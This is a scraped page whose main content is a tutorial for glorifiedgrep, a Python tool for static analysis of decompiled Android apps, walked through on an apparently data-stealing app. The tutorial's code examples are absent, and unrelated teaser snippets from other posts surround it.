In a recent workshop on low-budget film production, the moderator asked the class if anyone had Googled his name. I did, and what I discovered concerned me. Gary had recently been sued for breach of…
Glorifiedgrep is simply a python library that leverages jadx and ripgrep to analyze decompiled code. It is written to be compatible with python 3.7, but will be changed in the future for over python version compatibility. It is still in development and the api might/will change in the future.
The GlorifiedAndroid class for glorifiedgrep offers over 200+ different methods for Android analysis, but only a very few are shown here. Refer to the full documentation for all the analysis.
Also keep in mind that glorifiedgrep is not a vulnerability detection module. What it aids in is to quickly pinpoint areas of interest what should be further looked into.
Analysis
To use glorifiedgrep
, first, we need to instantiate the GlorifiedAndroid class.
Get the hash of the application.
We can obtain the hash of the application using:
Dangerous permissions
We can obtain a list of the dangerous permissions that are being used by the app using:
File types
Researchers have indicated that this apk is bundled with a few executables. Lets use glorifiedgrep
to get all the different file types that are bundled with this app.
Using one simple method, we can see the various binaries that are include in the app along with the blacklisted apps file.
Executing shell commands
Instead of using JNI, the application directly executes some of the pre packed binaries in the shell. We can see instances of shell execution here using
Reading sensitive information
Researchers have also indicated that the application will read various sensitive user information including SMS, calendar entries and call logs. Usually, these information are obtained from content resolvers. glorifiedgrep offers a handy method to obtain URLs for various content resolves. Using a little list comprehension, let’s gather all the content resolvers this application touches on. We will also include only app code in our analysis.
Application queries for installed packages
The native PackageManager class and its method getInstalledPackages from the Android SDK can be used by an app to enumerate installed applications on a device. We can see that using:
Application makes POST requests
Researches have indicated that this application will post all the enumerated data. We can see the POST requests in
Hardcoded IP address
We know that the application will try to send the data to a local 192 IP address. We can see those in:
Environment variables
We can also see that the application tries to access External storage to save its data. We can do so by checking which environment variables it is trying to access.
Conclusion
As we can see, we can do a variety of Android application analysis using glorifiedgrep in a really quickly.
Love is to feel and if the exact emotion, passion, and energy of the story are induced within the reader then it’s the finest deed by an author. Romance Novel, stresses the power of feeling. It…
Given that we are in the Anthropocene, a time when human influence is percolating at a global level with the potential to extend further out into the cosmos (as physicist David Deutsch has intimated…
Kyle called me up a few weeks back. It was neither expected or a massive surprise. He rolled through one’s life like that. “Hey dude, I got this fucking out there plan and I’m gonna need you to help…